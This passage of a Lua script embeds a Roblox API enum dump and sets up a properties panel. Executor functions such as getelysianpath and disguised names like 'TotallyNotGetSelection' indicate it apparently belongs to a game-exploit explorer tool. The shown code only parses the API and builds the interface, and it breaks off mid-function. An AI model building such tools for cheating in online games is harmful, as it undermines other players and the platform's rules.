"},{"type":"EnumItem","Name":"Level13","tags":[],"Value":13,"Enum":"QualityLevel"},{"type":"EnumItem","Name":"Level14","tags":[],"Value":14,"Enum":"QualityLevel"},{"type":"EnumItem","Name":"Level15","tags":[],"Value":15,"Enum":"QualityLevel"},{"type":"EnumItem","Name":"Level16","tags":[],"Value":16,"Enum":"QualityLevel"},{"type":"EnumItem","Name":"Level17","tags":[],"Value":17,"Enum":"QualityLevel"},{"type":"EnumItem","Name":"Level18","tags":[],"Value":18,"Enum":"QualityLevel"},{"type":"EnumItem","Name":"Level19","tags":[],"Value":19,"Enum":"QualityLevel"},{"type":"EnumItem","Name":"Level20","tags":[],"Value":20,"Enum":"QualityLevel"},{"type":"EnumItem","Name":"Level21","tags":[],"Value":21,"Enum":"QualityLevel"},{"type":"Enum","Name":"RenderPriority","tags":[]},{"type":"EnumItem","Name":"First","tags":[],"Value":0,"Enum":"RenderPriority"},{"type":"EnumItem","Name":"Input","tags":[],"Value":100,"Enum":"RenderPriority"},{"type":"EnumItem","Name":"Camera","tags":[],"Value":200,"Enum":"RenderPriority"},{"type":"EnumItem","Name":"Character","tags":[],"Value":300,"Enum":"RenderPriority"},{"type":"EnumItem","Name":"Last","tags":[],"Value":2000,"Enum":"RenderPriority"},{"type":"Enum","Name":"Resolution","tags":[]},{"type":"EnumItem","Name":"Automatic","tags":[],"Value":0,"Enum":"Resolution"},{"type":"EnumItem","Name":"720x526","tags":[],"Value":1,"Enum":"Resolution"},{"type":"EnumItem","Name":"800x600","tags":[],"Value":2,"Enum":"Resolution"},{"type":"EnumItem","Name":"1024x600","tags":[],"Value":3,"Enum":"Resolution"},{"type":"EnumItem","Name":"1024x768","tags":[],"Value":4,"Enum":"Resolution"},{"type":"EnumItem","Name":"1280x720","tags":[],"Value":5,"Enum":"Resolution"},{"type":"EnumItem","Name":"1280x768","tags":[],"Value":6,"Enum":"Resolution"},{"type":"EnumItem","Name":"1152x864","tags":[],"Value":7,"Enum":"Resolution"},{"type":"EnumItem","Name":"1280x800","tags":[],"Value":8,"Enum":"Resolution"},{"type":"EnumItem","Name":"1360x768","tags":[],"Value":9,"Enum":"Resolution"},{"type":"EnumItem","Name":"1280x960","tags":[],"Value":10,"Enum":"Resolution"},{"type":"EnumItem","Name":"1280x1024","tags":[],"Value":11,"Enum":"Resolution"},{"type":"EnumItem","Name":"1440x900","tags":[],"Value":12,"Enum":"Resolution"},{"type":"EnumItem","Name":"1600x900","tags":[],"Value":13,"Enum":"Resolution"},{"type":"EnumItem","Name":"1600x1024","tags":[],"Value":14,"Enum":"Resolution"},{"type":"EnumItem","Name":"1600x1200","tags":[],"Value":15,"Enum":"Resolution"},{"type":"EnumItem","Name":"1680x1050","tags":[],"Value":16,"Enum":"Resolution"},{"type":"EnumItem","Name":"1920x1080","tags":[],"Value":17,"Enum":"Resolution"},{"type":"EnumItem","Name":"1920x1200","tags":[],"Value":18,"Enum":"Resolution"},{"type":"Enum","Name":"ReverbType","tags":[]},{"type":"EnumItem","Name":"NoReverb","tags":[],"Value":0,"Enum":"ReverbType"},{"type":"EnumItem","Name":"GenericReverb","tags":[],"Value":1,"Enum":"ReverbType"},{"type":"EnumItem","Name":"PaddedCell","tags":[],"Value":2,"Enum":"ReverbType"},{"type":"EnumItem","Name":"Room","tags":[],"Value":3,"Enum":"ReverbType"},{"type":"EnumItem","Name":"Bathroom","tags":[],"Value":4,"Enum":"ReverbType"},{"type":"EnumItem","Name":"LivingRoom","tags":[],"Value":5,"Enum":"ReverbType"},{"type":"EnumItem","Name":"StoneRoom","tags":[],"Value":6,"Enum":"ReverbType"},{"type":"EnumItem","Name":"Auditorium","tags":[],"Value":7,"Enum":"ReverbType"},{"type":"EnumItem","Name":"ConcertHall","tags":[],"Value":8,"Enum":"ReverbType"},{"type":"EnumItem","Name":"Cave","tags":[],"Value":9,"Enum":"ReverbType"},{"type":"EnumItem","Name":"Arena","tags":[],"Value":10,"Enum":"ReverbType"},{"type":"EnumItem","Name":"Hangar","tags":[],"Value":11,"Enum":"ReverbType"},{"type":"EnumItem","Name":"CarpettedHallway","tags":[],"Value":12,"Enum":"ReverbType"},{"type":"EnumItem","Name":"Hallway","tags":[],"Value":13,"Enum":"ReverbType"},{"type":"EnumItem","Name":"StoneCorridor","tags":[],"Value":14,"Enum":"ReverbType"},{"type":"EnumItem","Name":"Alley","tags":[],"Value":15,"Enum":"ReverbType"},{"type":"EnumItem","Name":"Forest","tags":[],"Value":16,"Enum":"ReverbType"},{"type":"EnumItem","Name":"City","tags":[],"Value":17,"Enum":"ReverbType"},{"type":"EnumItem","Name":"Mountains","tags":[],"Value":18,"Enum":"ReverbType"},{"type":"EnumItem","Name":"Quarry","tags":[],"Value":19,"Enum":"ReverbType"},{"type":"EnumItem","Name":"Plain","tags":[],"Value":20,"Enum":"ReverbType"},{"type":"EnumItem","Name":"ParkingLot","tags":[],"Value":21,"Enum":"ReverbType"},{"type":"EnumItem","Name":"SewerPipe","tags":[],"Value":22,"Enum":"ReverbType"},{"type":"EnumItem","Name":"UnderWater","tags":[],"Value":23,"Enum":"ReverbType"},{"type":"Enum","Name":"RollOffMode","tags":[]},{"type":"EnumItem","Name":"Inverse","tags":[],"Value":0,"Enum":"RollOffMode"},{"type":"EnumItem","Name":"Linear","tags":[],"Value":1,"Enum":"RollOffMode"},{"type":"Enum","Name":"RotationType","tags":[]},{"type":"EnumItem","Name":"MovementRelative","tags":[],"Value":0,"Enum":"RotationType"},{"type":"EnumItem","Name":"CameraRelative","tags":[],"Value":1,"Enum":"RotationType"},{"type":"Enum","Name":"RuntimeUndoBehavior","tags":[]},{"type":"EnumItem","Name":"Aggregate","tags":[],"Value":0,"Enum":"RuntimeUndoBehavior"},{"type":"EnumItem","Name":"Snapshot","tags":[],"Value":1,"Enum":"RuntimeUndoBehavior"},{"type":"EnumItem","Name":"Hybrid","tags":[],"Value":2,"Enum":"RuntimeUndoBehavior"},{"type":"Enum","Name":"SaveFilter","tags":[]},{"type":"EnumItem","Name":"SaveAll","tags":[],"Value":2,"Enum":"SaveFilter"},{"type":"EnumItem","Name":"SaveWorld","tags":[],"Value":0,"Enum":"SaveFilter"},{"type":"EnumItem","Name":"SaveGame","tags":[],"Value":1,"Enum":"SaveFilter"},{"type":"Enum","Name":"SavedQualitySetting","tags":[]},{"type":"EnumItem","Name":"Automatic","tags":[],"Value":0,"Enum":"SavedQualitySetting"},{"type":"EnumItem","Name":"QualityLevel1","tags":[],"Value":1,"Enum":"SavedQualitySetting"},{"type":"EnumItem","Name":"QualityLevel2","tags":[],"Value":2,"Enum":"SavedQualitySetting"},{"type":"EnumItem","Name":"QualityLevel3","tags":[],"Value":3,"Enum":"SavedQualitySetting"},{"type":"EnumItem","Name":"QualityLevel4","tags":[],"Value":4,"Enum":"SavedQualitySetting"},{"type":"EnumItem","Name":"QualityLevel5","tags":[],"Value":5,"Enum":"SavedQualitySetting"},{"type":"EnumItem","Name":"QualityLevel6","tags":[],"Value":6,"Enum":"SavedQualitySetting"},{"type":"EnumItem","Name":"QualityLevel7","tags":[],"Value":7,"Enum":"SavedQualitySetting"},{"type":"EnumItem","Name":"QualityLevel8","tags":[],"Value":8,"Enum":"SavedQualitySetting"},{"type":"EnumItem","Name":"QualityLevel9","tags":[],"Value":9,"Enum":"SavedQualitySetting"},{"type":"EnumItem","Name":"QualityLevel10","tags":[],"Value":10,"Enum":"SavedQualitySetting"},{"type":"Enum","Name":"ScaleType","tags":[]},{"type":"EnumItem","Name":"Stretch","tags":[],"Value":0,"Enum":"ScaleType"},{"type":"EnumItem","Name":"Slice","tags":[],"Value":1,"Enum":"ScaleType"},{"type":"Enum","Name":"SizeConstraint","tags":[]},{"type":"EnumItem","Name":"RelativeXY","tags":[],"Value":0,"Enum":"SizeConstraint"},{"type":"EnumItem","Name":"RelativeXX","tags":[],"Value":1,"Enum":"SizeConstraint"},{"type":"EnumItem","Name":"RelativeYY","tags":[],"Value":2,"Enum":"SizeConstraint"},{"type":"Enum","Name":"SleepAdjustMethod","tags":[]},{"type":"EnumItem","Name":"None","tags":[],"Value":0,"Enum":"SleepAdjustMethod"},{"type":"EnumItem","Name":"LastSample","tags":[],"Value":1,"Enum":"SleepAdjustMethod"},{"type":"EnumItem","Name":"AverageInterval","tags":[],"Value":2,"Enum":"SleepAdjustMethod"},{"type":"Enum","Name":"SoundType","tags":[]},{"type":"EnumItem","Name":"NoSound","tags":[],"Value":0,"Enum":"SoundType"},{"type":"EnumItem","Name":"Boing","tags":[],"Value":1,"Enum":"SoundType"},{"type":"EnumItem","Name":"Bomb","tags":[],"Value":2,"Enum":"SoundType"},{"type":"EnumItem","Name":"Break","tags":[],"Value":3,"Enum":"SoundType"},{"type":"EnumItem","Name":"Click","tags":[],"Value":4,"Enum":"SoundType"},{"type":"EnumItem","Name":"Clock","tags":[],"Value":5,"Enum":"SoundType"},{"type":"EnumItem","Name":"Slingshot","tags":[],"Value":6,"Enum":"SoundType"},{"type":"EnumItem","Name":"Page","tags":[],"Value":7,"Enum":"SoundType"},{"type":"EnumItem","Name":"Ping","tags":[],"Value":8,"Enum":"SoundType"},{"type":"EnumItem","Name":"Snap","tags":[],"Value":9,"Enum":"SoundType"},{"type":"EnumItem","Name":"Splat","tags":[],"Value":10,"Enum":"SoundType"},{"type":"EnumItem","Name":"Step","tags":[],"Value":11,"Enum":"SoundType"},{"type":"EnumItem","Name":"StepOn","tags":[],"Value":12,"Enum":"SoundType"},{"type":"EnumItem","Name":"Swoosh","tags":[],"Value":13,"Enum":"SoundType"},{"type":"EnumItem","Name":"Victory","tags":[],"Value":14,"Enum":"SoundType"},{"type":"Enum","Name":"SpecialKey","tags":[]},{"type":"EnumItem","Name":"Insert","tags":[],"Value":0,"Enum":"SpecialKey"},{"type":"EnumItem","Name":"Home","tags":[],"Value":1,"Enum":"SpecialKey"},{"type":"EnumItem","Name":"End","tags":[],"Value":2,"Enum":"SpecialKey"},{"type":"EnumItem","Name":"PageUp","tags":[],"Value":3,"Enum":"SpecialKey"},{"type":"EnumItem","Name":"PageDown","tags":[],"Value":4,"Enum":"SpecialKey"},{"type":"EnumItem","Name":"ChatHotkey","tags":[],"Value":5,"Enum":"SpecialKey"},{"type":"Enum","Name":"Status","tags":[]},{"type":"EnumItem","Name":"Poison","tags":["deprecated"],"Value":0,"Enum":"Status"},{"type":"EnumItem","Name":"Confusion","tags":["deprecated"],"Value":1,"Enum":"Status"},{"type":"Enum","Name":"Stuff","tags":[]},{"type":"EnumItem","Name":"Heads","tags":[],"Value":0,"Enum":"Stuff"},{"type":"EnumItem","Name":"Faces","tags":[],"Value":1,"Enum":"Stuff"},{"type":"EnumItem","Name":"Hats","tags":[],"Value":2,"Enum":"Stuff"},{"type":"EnumItem","Name":"TShirts","tags":[],"Value":3,"Enum":"Stuff"},{"type":"EnumItem","Name":"Shirts","tags":[],"Value":4,"Enum":"Stuff"},{"type":"EnumItem","Name":"Pants","tags":[],"Value":5,"Enum":"Stuff"},{"type":"EnumItem","Name":"Gears","tags":[],"Value":6,"Enum":"Stuff"},{"type":"EnumItem","Name":"Torsos","tags":[],"Value":7,"Enum":"Stuff"},{"type":"EnumItem","Name":"LeftArms","tags":[],"Value":8,"Enum":"Stuff"},{"type":"EnumItem","Name":"RightArms","tags":[],"Value":9,"Enum":"Stuff"},{"type":"EnumItem","Name":"LeftLegs","tags":[],"Value":10,"Enum":"Stuff"},{"type":"EnumItem","Name":"RightLegs","tags":[],"Value":11,"Enum":"Stuff"},{"type":"EnumItem","Name":"Bodies","tags":[],"Value":12,"Enum":"Stuff"},{"type":"EnumItem","Name":"Costumes","tags":[],"Value":13,"Enum":"Stuff"},{"type":"Enum","Name":"Style","tags":[]},{"type":"EnumItem","Name":"AlternatingSupports","tags":[],"Value":0,"Enum":"Style"},{"type":"EnumItem","Name":"BridgeStyleSupports","tags":[],"Value":1,"Enum":"Style"},{"type":"EnumItem","Name":"NoSupports","tags":[],"Value":2,"Enum":"Style"},{"type":"Enum","Name":"SurfaceConstraint","tags":[]},{"type":"EnumItem","Name":"None","tags":[],"Value":0,"Enum":"SurfaceConstraint"},{"type":"EnumItem","Name":"Hinge","tags":[],"Value":1,"Enum":"SurfaceConstraint"},{"type":"EnumItem","Name":"SteppingMotor","tags":[],"Value":2,"Enum":"SurfaceConstraint"},{"type":"EnumItem","Name":"Motor","tags":[],"Value":3,"Enum":"SurfaceConstraint"},{"type":"Enum","Name":"SurfaceType","tags":[]},{"type":"EnumItem","Name":"Smooth","tags":[],"Value":0,"Enum":"SurfaceType"},{"type":"EnumItem","Name":"Glue","tags":[],"Value":1,"Enum":"SurfaceType"},{"type":"EnumItem","Name":"Weld","tags":[],"Value":2,"Enum":"SurfaceType"},{"type":"EnumItem","Name":"Studs","tags":[],"Value":3,"Enum":"SurfaceType"},{"type":"EnumItem","Name":"Inlet","tags":[],"Value":4,"Enum":"SurfaceType"},{"type":"EnumItem","Name":"Universal","tags":[],"Value":5,"Enum":"SurfaceType"},{"type":"EnumItem","Name":"Hinge","tags":[],"Value":6,"Enum":"SurfaceType"},{"type":"EnumItem","Name":"Motor","tags":[],"Value":7,"Enum":"SurfaceType"},{"type":"EnumItem","Name":"SteppingMotor","tags":[],"Value":8,"Enum":"SurfaceType"},{"type":"EnumItem","Name":"Unjoinable","tags":[],"Value":9,"Enum":"SurfaceType"},{"type":"EnumItem","Name":"SmoothNoOutlines","tags":[],"Value":10,"Enum":"SurfaceType"},{"type":"Enum","Name":"SwipeDirection","tags":[]},{"type":"EnumItem","Name":"Right","tags":[],"Value":0,"Enum":"SwipeDirection"},{"type":"EnumItem","Name":"Left","tags":[],"Value":1,"Enum":"SwipeDirection"},{"type":"EnumItem","Name":"Up","tags":[],"Value":2,"Enum":"SwipeDirection"},{"type":"EnumItem","Name":"Down","tags":[],"Value":3,"Enum":"SwipeDirection"},{"type":"EnumItem","Name":"None","tags":[],"Value":4,"Enum":"SwipeDirection"},{"type":"Enum","Name":"TeleportState","tags":[]},{"type":"EnumItem","Name":"RequestedFromServer","tags":[],"Value":0,"Enum":"TeleportState"},{"type":"EnumItem","Name":"Started","tags":[],"Value":1,"Enum":"TeleportState"},{"type":"EnumItem","Name":"WaitingForServer","tags":[],"Value":2,"Enum":"TeleportState"},{"type":"EnumItem","Name":"Failed","tags":[],"Value":3,"Enum":"TeleportState"},{"type":"EnumItem","Name":"InProgress","tags":[],"Value":4,"Enum":"TeleportState"},{"type":"Enum","Name":"TeleportType","tags":[]},{"type":"EnumItem","Name":"ToPlace","tags":[],"Value":0,"Enum":"TeleportType"},{"type":"EnumItem","Name":"ToInstance","tags":[],"Value":1,"Enum":"TeleportType"},{"type":"EnumItem","Name":"ToReservedServer","tags":[],"Value":2,"Enum":"TeleportType"},{"type":"Enum","Name":"TextXAlignment","tags":[]},{"type":"EnumItem","Name":"Left","tags":[],"Value":0,"Enum":"TextXAlignment"},{"type":"EnumItem","Name":"Center","tags":[],"Value":2,"Enum":"TextXAlignment"},{"type":"EnumItem","Name":"Right","tags":[],"Value":1,"Enum":"TextXAlignment"},{"type":"Enum","Name":"TextYAlignment","tags":[]},{"type":"EnumItem","Name":"Top","tags":[],"Value":0,"Enum":"TextYAlignment"},{"type":"EnumItem","Name":"Center","tags":[],"Value":1,"Enum":"TextYAlignment"},{"type":"EnumItem","Name":"Bottom","tags":[],"Value":2,"Enum":"TextYAlignment"},{"type":"Enum","Name":"ThreadPoolConfig","tags":[]},{"type":"EnumItem","Name":"Auto","tags":[],"Value":0,"Enum":"ThreadPoolConfig"},{"type":"EnumItem","Name":"PerCore1","tags":[],"Value":101,"Enum":"ThreadPoolConfig"},{"type":"EnumItem","Name":"PerCore2","tags":[],"Value":102,"Enum":"ThreadPoolConfig"},{"type":"EnumItem","Name":"PerCore3","tags":[],"Value":103,"Enum":"ThreadPoolConfig"},{"type":"EnumItem","Name":"PerCore4","tags":[],"Value":104,"Enum":"ThreadPoolConfig"},{"type":"EnumItem","Name":"Threads1","tags":[],"Value":1,"Enum":"ThreadPoolConfig"},{"type":"EnumItem","Name":"Threads2","tags":[],"Value":2,"Enum":"ThreadPoolConfig"},{"type":"EnumItem","Name":"Threads3","tags":[],"Value":3,"Enum":"ThreadPoolConfig"},{"type":"EnumItem","Name":"Threads4","tags":[],"Value":4,"Enum":"ThreadPoolConfig"},{"type":"EnumItem","Name":"Threads8","tags":[],"Value":8,"Enum":"ThreadPoolConfig"},{"type":"EnumItem","Name":"Threads16","tags":[],"Value":16,"Enum":"ThreadPoolConfig"},{"type":"Enum","Name":"ThrottlingPriority","tags":[]},{"type":"EnumItem","Name":"Extreme","tags":[],"Value":2,"Enum":"ThrottlingPriority"},{"type":"EnumItem","Name":"ElevatedOnServer","tags":[],"Value":1,"Enum":"ThrottlingPriority"},{"type":"EnumItem","Name":"Default","tags":[],"Value":0,"Enum":"ThrottlingPriority"},{"type":"Enum","Name":"TickCountSampleMethod","tags":[]},{"type":"EnumItem","Name":"Fast","tags":[],"Value":0,"Enum":"TickCountSampleMethod"},{"type":"EnumItem","Name":"Benchmark","tags":[],"Value":1,"Enum":"TickCountSampleMethod"},{"type":"EnumItem","Name":"Precise","tags":[],"Value":2,"Enum":"TickCountSampleMethod"},{"type":"Enum","Name":"TopBottom","tags":[]},{"type":"EnumItem","Name":"Top","tags":[],"Value":0,"Enum":"TopBottom"},{"type":"EnumItem","Name":"Center","tags":[],"Value":1,"Enum":"TopBottom"},{"type":"EnumItem","Name":"Bottom","tags":[],"Value":2,"Enum":"TopBottom"},{"type":"Enum","Name":"TouchCameraMovementMode","tags":[]},{"type":"EnumItem","Name":"Default","tags":[],"Value":0,"Enum":"TouchCameraMovementMode"},{"type":"EnumItem","Name":"Follow","tags":[],"Value":2,"Enum":"TouchCameraMovementMode"},{"type":"EnumItem","Name":"Classic","tags":[],"Value":1,"Enum":"TouchCameraMovementMode"},{"type":"Enum","Name":"TouchMovementMode","tags":[]},{"type":"EnumItem","Name":"Default","tags":[],"Value":0,"Enum":"TouchMovementMode"},{"type":"EnumItem","Name":"Thumbstick","tags":[],"Value":1,"Enum":"TouchMovementMode"},{"type":"EnumItem","Name":"DPad","tags":[],"Value":2,"Enum":"TouchMovementMode"},{"type":"EnumItem","Name":"Thumbpad","tags":[],"Value":3,"Enum":"TouchMovementMode"},{"type":"EnumItem","Name":"ClickToMove","tags":[],"Value":4,"Enum":"TouchMovementMode"},{"type":"Enum","Name":"TweenStatus","tags":[]},{"type":"EnumItem","Name":"Canceled","tags":[],"Value":0,"Enum":"TweenStatus"},{"type":"EnumItem","Name":"Completed","tags":[],"Value":1,"Enum":"TweenStatus"},{"type":"Enum","Name":"UiMessageType","tags":[]},{"type":"EnumItem","Name":"UiMessageError","tags":[],"Value":0,"Enum":"UiMessageType"},{"type":"EnumItem","Name":"UiMessageInfo","tags":[],"Value":1,"Enum":"UiMessageType"},{"type":"Enum","Name":"UploadSetting","tags":[]},{"type":"EnumItem","Name":"Never","tags":[],"Value":0,"Enum":"UploadSetting"},{"type":"EnumItem","Name":"Ask","tags":[],"Value":1,"Enum":"UploadSetting"},{"type":"EnumItem","Name":"Always","tags":[],"Value":2,"Enum":"UploadSetting"},{"type":"Enum","Name":"UserCFrame","tags":[]},{"type":"EnumItem","Name":"Head","tags":[],"Value":0,"Enum":"UserCFrame"},{"type":"EnumItem","Name":"LeftHand","tags":[],"Value":1,"Enum":"UserCFrame"},{"type":"EnumItem","Name":"RightHand","tags":[],"Value":2,"Enum":"UserCFrame"},{"type":"Enum","Name":"UserInputState","tags":[]},{"type":"EnumItem","Name":"Begin","tags":[],"Value":0,"Enum":"UserInputState"},{"type":"EnumItem","Name":"Change","tags":[],"Value":1,"Enum":"UserInputState"},{"type":"EnumItem","Name":"End","tags":[],"Value":2,"Enum":"UserInputState"},{"type":"EnumItem","Name":"Cancel","tags":[],"Value":3,"Enum":"UserInputState"},{"type":"EnumItem","Name":"None","tags":[],"Value":4,"Enum":"UserInputState"},{"type":"Enum","Name":"UserInputType","tags":[]},{"type":"EnumItem","Name":"MouseButton1","tags":[],"Value":0,"Enum":"UserInputType"},{"type":"EnumItem","Name":"MouseButton2","tags":[],"Value":1,"Enum":"UserInputType"},{"type":"EnumItem","Name":"MouseButton3","tags":[],"Value":2,"Enum":"UserInputType"},{"type":"EnumItem","Name":"MouseWheel","tags":[],"Value":3,"Enum":"UserInputType"},{"type":"EnumItem","Name":"MouseMovement","tags":[],"Value":4,"Enum":"UserInputType"},{"type":"EnumItem","Name":"Touch","tags":[],"Value":7,"Enum":"UserInputType"},{"type":"EnumItem","Name":"Keyboard","tags":[],"Value":8,"Enum":"UserInputType"},{"type":"EnumItem","Name":"Focus","tags":[],"Value":9,"Enum":"UserInputType"},{"type":"EnumItem","Name":"Accelerometer","tags":[],"Value":10,"Enum":"UserInputType"},{"type":"EnumItem","Name":"Gyro","tags":[],"Value":11,"Enum":"UserInputType"},{"type":"EnumItem","Name":"Gamepad1","tags":[],"Value":12,"Enum":"UserInputType"},{"type":"EnumItem","Name":"Gamepad2","tags":[],"Value":13,"Enum":"UserInputType"},{"type":"EnumItem","Name":"Gamepad3","tags":[],"Value":14,"Enum":"UserInputType"},{"type":"EnumItem","Name":"Gamepad4","tags":[],"Value":15,"Enum":"UserInputType"},{"type":"EnumItem","Name":"Gamepad5","tags":[],"Value":16,"Enum":"UserInputType"},{"type":"EnumItem","Name":"Gamepad6","tags":[],"Value":17,"Enum":"UserInputType"},{"type":"EnumItem","Name":"Gamepad7","tags":[],"Value":18,"Enum":"UserInputType"},{"type":"EnumItem","Name":"Gamepad8","tags":[],"Value":19,"Enum":"UserInputType"},{"type":"EnumItem","Name":"TextInput","tags":[],"Value":20,"Enum":"UserInputType"},{"type":"EnumItem","Name":"None","tags":[],"Value":21,"Enum":"UserInputType"},{"type":"Enum","Name":"VibrationMotor","tags":[]},{"type":"EnumItem","Name":"Large","tags":[],"Value":0,"Enum":"VibrationMotor"},{"type":"EnumItem","Name":"Small","tags":[],"Value":1,"Enum":"VibrationMotor"},{"type":"EnumItem","Name":"LeftTrigger","tags":[],"Value":2,"Enum":"VibrationMotor"},{"type":"EnumItem","Name":"RightTrigger","tags":[],"Value":3,"Enum":"VibrationMotor"},{"type":"EnumItem","Name":"LeftHand","tags":[],"Value":4,"Enum":"VibrationMotor"},{"type":"EnumItem","Name":"RightHand","tags":[],"Value":5,"Enum":"VibrationMotor"},{"type":"Enum","Name":"VideoQualitySettings","tags":[]},{"type":"EnumItem","Name":"LowResolution","tags":[],"Value":0,"Enum":"VideoQualitySettings"},{"type":"EnumItem","Name":"MediumResolution","tags":[],"Value":1,"Enum":"VideoQualitySettings"},{"type":"EnumItem","Name":"HighResolution","tags":[],"Value":2,"Enum":"VideoQualitySettings"},{"type":"Enum","Name":"WaterDirection","tags":[]},{"type":"EnumItem","Name":"NegX","tags":[],"Value":0,"Enum":"WaterDirection"},{"type":"EnumItem","Name":"X","tags":[],"Value":1,"Enum":"WaterDirection"},{"type":"EnumItem","Name":"NegY","tags":[],"Value":2,"Enum":"WaterDirection"},{"type":"EnumItem","Name":"Y","tags":[],"Value":3,"Enum":"WaterDirection"},{"type":"EnumItem","Name":"NegZ","tags":[],"Value":4,"Enum":"WaterDirection"},{"type":"EnumItem","Name":"Z","tags":[],"Value":5,"Enum":"WaterDirection"},{"type":"Enum","Name":"WaterForce","tags":[]},{"type":"EnumItem","Name":"None","tags":[],"Value":0,"Enum":"WaterForce"},{"type":"EnumItem","Name":"Small","tags":[],"Value":1,"Enum":"WaterForce"},{"type":"EnumItem","Name":"Medium","tags":[],"Value":2,"Enum":"WaterForce"},{"type":"EnumItem","Name":"Strong","tags":[],"Value":3,"Enum":"WaterForce"},{"type":"EnumItem","Name":"Max","tags":[],"Value":4,"Enum":"WaterForce"}] ]===] return rawApiJson end function getCurrentApiJson() local jsonStr = nil if readfile and getelysianpath then if readfile(getelysianpath().."Xpl0rerApi.txt") then print("Api found in folder!") jsonStr = readfile(getelysianpath().."Xpl0rerApi.txt") return jsonStr end end local success, err = pcall(function() jsonStr = httpGet(apiUrl) print("Fetched json successfully") end) if success then print("Returning json") --print(jsonStr:sub(1,500)) return jsonStr else print("Error fetching json: " .. tostring(err)) print("Falling back to local copy") return getLocalApiJson() end end function splitStringIntoChunks(jsonStr) -- Splits up a string into a table with a given size local t = {} for i = 1, math.ceil(string.len(jsonStr)/maxChunkSize) do local str = jsonStr:sub((i-1)*maxChunkSize+1, i*maxChunkSize) table.insert(t, str) end return t end local jsonToParse = getCurrentApiJson() local apiChunks = splitStringIntoChunks(jsonToParse) function getRbxApi() --[[ Api.Classes Api.Enums Api.GetProperties(className) Api.IsEnum(valueType) --]] -- Services local HttpService = game:GetService("HttpService") local ServerStorage = game:GetService("ServerStorage") local ReplicatedStorage = game:GetService("ReplicatedStorage") -- Remotes --local Remotes = ReplicatedStorage:WaitForChild("OnlineStudio"):WaitForChild("Remotes") --local GetApiJsonFunction = Remotes:WaitForChild("GetApiJson") -- Functions local JsonDecode = function(s) return HttpService:JSONDecode(s) end local function GetApiRemoteFunction(index) if (apiChunks[index]) then return apiChunks[index], #apiChunks else print("Bad index for GetApiJson") return nil end end local function getApiJson() local apiTable = {} local firstPage, pageCount = GetApiRemoteFunction(1) table.insert(apiTable, firstPage) for i = 2, pageCount do --print("Fetching API page # " .. tostring(i)) local result = GetApiRemoteFunction(i) table.insert(apiTable, result) end return table.concat(apiTable) end local json = getApiJson() local apiDump = JsonDecode(json) local Classes = {} local Enums = {} local function sortAlphabetic(t, property) table.sort(t, function(x,y) return x[property] < y[property] end) end local function isEnum(name) return Enums[name] ~= nil end local function getProperties(className) local class = Classes[className] local properties = {} if not class then return properties end while class do for _,property in pairs(class.Properties) do table.insert(properties, property) end class = Classes[class.Superclass] end sortAlphabetic(properties, "Name") return properties end for _,item in pairs(apiDump) do local itemType = item.type -- Classes -- if (itemType == 'Class') then Classes[item.Name] = item item.Properties = {} item.Functions = {} item.YieldFunctions = {} item.Events = {} item.Callbacks = {} -- Members -- elseif (itemType == 'Property') then table.insert(Classes[item.Class].Properties, item) elseif (itemType == 'Function') then table.insert(Classes[item.Class].Functions, item) elseif (itemType == 'YieldFunction') then table.insert(Classes[item.Class].YieldFunctions, item) elseif (itemType == 'Event') then table.insert(Classes[item.Class].Events, item) elseif (itemType == 'Callback') then table.insert(Classes[item.Class].Callbacks, item) -- Enums -- elseif (itemType == 'Enum') then Enums[item.Name] = item item.EnumItems = {} elseif (itemType == 'EnumItem') then Enums[item.Enum].EnumItems[item.Name] = item end end return { Classes = Classes; Enums = Enums; GetProperties = getProperties; IsEnum = isEnum; } end -- Modules local Permissions = {CanEdit = true} local RbxApi = getRbxApi() --[[ RbxApi.Classes RbxApi.Enums RbxApi.GetProperties(className) RbxApi.IsEnum(valueType) --]] -- Styles local function CreateColor3(r, g, b) return Color3.new(r/255,g/255,b/255) end local Styles = { Font = Enum.Font.Arial; Margin = 5; Black = CreateColor3(0,0,0); White = CreateColor3(255,255,255); } local Row = { Font = Styles.Font; FontSize = Enum.FontSize.Size14; TextXAlignment = Enum.TextXAlignment.Left; TextColor = Styles.Black; TextColorOver = Styles.White; TextLockedColor = CreateColor3(120,120,120); Height = 24; BorderColor = CreateColor3(216,216,216); BackgroundColor = Styles.White; BackgroundColorAlternate = CreateColor3(246,246,246); BackgroundColorMouseover = CreateColor3(211,224,244); TitleMarginLeft = 15; } local DropDown = { Font = Styles.Font; FontSize = Enum.FontSize.Size14; TextColor = CreateColor3(0,0,0); TextColorOver = Styles.White; TextXAlignment = Enum.TextXAlignment.Left; Height = 16; BackColor = Styles.White; BackColorOver = CreateColor3(86,125,188); BorderColor = CreateColor3(216,216,216); BorderSizePixel = 2; ArrowColor = CreateColor3(160,160,160); ArrowColorOver = Styles.Black; } local BrickColors = { BoxSize = 13; BorderSizePixel = 1; BorderColor = CreateColor3(160,160,160); FrameColor = CreateColor3(160,160,160); Size = 20; Padding = 4; ColorsPerRow = 8; OuterBorder = 1; OuterBorderColor = Styles.Black; } wait(1) local Gui = D_E_X local PropertiesFrame = Gui:WaitForChild("PropertiesFrame") local ExplorerFrame = Gui:WaitForChild("ExplorerPanel") local bindGetSelection = ExplorerFrame.TotallyNotGetSelection local bindSelectionChanged = ExplorerFrame.TotallyNotSelectionChanged local bindGetApi = PropertiesFrame.GetApi local bindGetAwait = PropertiesFrame.GetAwaiting local bindSetAwait = PropertiesFrame.SetAwaiting local ContentUrl = ContentProvider.BaseUrl .. "asset/?id=" local SettingsRemote = Gui:WaitForChild("SettingsPanel"):WaitForChild("GetSetting") local propertiesSearch = PropertiesFrame.Header.TextBox local AwaitingObjectValue = false local AwaitingObjectObj local AwaitingObjectProp function searchingProperties() if propertiesSearch.Text ~= "" and propertiesSearch.Text ~= "Search Properties" then return true end return false end local function GetSelection() local selection = bindGetSelection:Invoke() if #selection == 0 then return nil else return selection end end -- Number local function Round(number, decimalPlaces) return tonumber(string.format("%." .. (decimalPlaces or 0) .. "f", number)) end -- Strings local function Split(str, delimiter) local start = 1 local t = {} while true do local pos = string.find (str, delimiter, start, true) if not pos then break end table.insert (t, string.sub (str, start, pos - 1)) start = pos + string.len (delimiter) end table.insert (t, string.sub (str, start)) return t end -- Data Type Handling local function ToString(value, type) if type == "float" then return tostring(Round(value,2)) elseif type == "Content" then if string.find(value,"/asset") then local match = string.find(value, "=") + 1 local id = string.sub(value, match) return id else return tostring(value) end elseif type == "Vector2" then local x = value.x local y = value.y return string.format("%g, %g", x,y) elseif type == "Vector3" then local x = value.x local y = value.y local z = value.z return string.format("%g, %g, %g", x,y,z) elseif type == "Color3" then local r = value.r local g = value.g local b = value.b return string.format("%d, %d, 